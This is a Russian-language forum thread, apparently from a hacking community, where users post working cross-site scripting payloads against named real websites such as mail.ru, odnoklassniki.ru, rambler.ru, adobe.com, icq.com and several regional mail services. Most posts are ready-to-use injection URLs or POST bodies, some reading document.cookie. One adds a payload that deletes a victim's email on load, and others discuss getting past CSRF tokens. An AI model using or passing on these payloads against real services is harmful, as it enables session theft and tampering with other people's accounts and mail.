Пассивные xss на почтовых серверах

Unix@, как эту XSS можно использовать на практике?

 

@bigmir.net

Тип уязвимости: Активная XSS
Находится в сервисе "Дневники".

Где найти?

Мой дневник => Заметки => Добавить заметку​

Уязвимое поле:

Теги​

Пример:

<script>alert('xss')</script>​

 

XSS на Mail.ru

Работает только у авторизованных.

Нажать кнопку Продолжить

 

Code:

http://vashdom.tut.by/search/?search=</title><script>alert('xss')</script>

 

TUT.by

Пассивка TUT.by

 

icq.com

validate.icq.com/icq/validate.html?uid=1&sid=23"><script>alert('XSS')</script>&lang=en


adobe.com

store1.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert('xss')>&code=adobe&cat=classification

 

Пассивка на ачате))

PR 5 | GI - 4 980 000 | CY 240 | 243 000

Античат конечно не почтовый сервис, но я думаю меня простят)))


http://video.antichat.ru/video/Номер видео/

Post запрос

Там еще защита от CSRF стоит, так что для приведения в действие надо использовать технику считывания токена, (ссылка )

 

Данные с сайта можно считать только при наличии XSS. Здесь нет токена, значит нет XSS, значит нет токена, значит нет XSS... В общем, это фейл

 

Действительно, херня какая-то ))))
Оказывается при выполнении функции отправки комментария и происходит инжект, в код который занимается собственно отправкой:

Code:

function ajaxComment(){  //Эта херня отправляет коммент, только надо в параметрах баттона указать return false;
              [COLOR=Red]  var author = document.getElementsByName('author')[1].value;
                var message = document.getElementsByName('comment')[0].value;[/COLOR]
                var csrf = document.getElementsByName('csrfmiddlewaretoken')[0].value;
                $.ajax({
			type: "POST",
                        url: document.location.href,
                        data: "csrfmiddlewaretoken="+csrf+"&author="+author+"&comment="+message,
			success: function() {
				$('#comment').hide().append('<div class="comment-box"><div class="comment-top"><span class="comment-box-nick">'+author+'</span> написал</div><p>'+message+'</p></div>').show('slow');
				}
			});
	return false;
						
} 

И хотя данные после отправки на php чистятся, сама возможность инъекции присутствует, но ее нельзя удаленно эксплуатировать, потому что страница защищена опять такие тем самым токеном, если бы была возможность провести csrf, эту атаку можно было бы реализовать удаленно, делая инжект через пост запрос

А моя статья оказывается тут нифига не поможет, потому что она нужна когда есть удаленный xss и требуется csrf, а у нас нет удаленного xss ))

 

Но человек должен вставить свой код и нажать кнопку отправки. Есть идеи насчет практической реализации атаки?

Нет. Это DOM-based XSS, код внедряется напрямую через JS, а не возвращается в ответе на POST-запрос.

 

Я тоже самое сказал)) Имелось ввиду что можно было бы кликабельную пассивку получить..

Насчет практики, нет, не юзабельно (удаленно)

Хотя, теоретически))

Можно:
1.отправить человека на свой php скрипт
2.скрипт выводит iframe с античатом
3.js код введет наш инъект в поле в iframe, и 'нажмет' на кнопку отправить коммент
4.инжект выполнится))

Ну в общем это из раздела фантастики))))

 

Не получится. http://ru.wikipedia.org/wiki/Правило_ограничения_домена

 

km.ru​

После ошибки авторизации на главной странице, вы будете перенаправлены на http://n.mail.km.ru/extra/form. Не фильтруется поле "Пароль".

Post:​

PHP:

user_login=support-mail&user_domain=freemail.ru&user_password=%22%3E%3Cscript%3Ealert%28%27Hello%2C+world%27%29%3B%3C%2Fscript%3E&op=%D0%92%D0%BE%D0%B9%D1%82%D0%B8&form_build_id=form-a080de13ffb21494853525a2e1c6cf72&form_id=_imap_mail_extra_login_form

Утверждение верно для всех доменов, кроме km.ru (@freemail.ru, @bossmail.ru etc.)

 

Активная xss в теле письма на 59.ru

Активная xss в теле письма на http://59.ru/
Почта
Xss код

HTML:

<img src=k onerror=alert('xss') >

Далее я сделал бонус,автоудаление письма

Код автоудаление письма

HTML:

<img src=k onerror=mod_mail_message_form_action('messages_delete'); >

Я бы этот код запихал в JS фаил и вызвал через xss.

Но есть но,нужно сделать очистку корзины,поэтому надо делать через Js фаил.

PS создайте тему с активными xss в теле письма пжл.

 

Активная xss на foto.meta.ua

Активка тут http://foto.meta.ua/4552903.image

Уязвимый код тэги

" onmouseover='alert(document.cookie)'

Выполняется принаведении на тэги.

 

job.gala.net


http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email="><script>alert('xz che za')</script>

 

http://avia.rambler.ru/anytime?max_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E
http://avia.rambler.ru/anytime?min_days=%3Cimg%20src=x:%20onerror=alert(document.cookie)%3E

 

Пассивная XSS odnoklassniki.ru
https://cards2.odnoklassniki.ru/index.html?ServiceDescr=<b>XSS</b>

 

Пассивная XSS odnoklassniki.ru
http://api.odnoklassniki.ru/fb.do?method=users.getInfo&js_callback=<BODY ONLOAD=alert('XSS')>

 

Пассивная XSS в mail.ru

Пассивная XSS в mail.ru работает в опере

Code:

http://gameshop.mail.ru/order/?back=%22%3E%3Cscript%3Ealert%28%29%3C/script%3E

//Может ещё выложу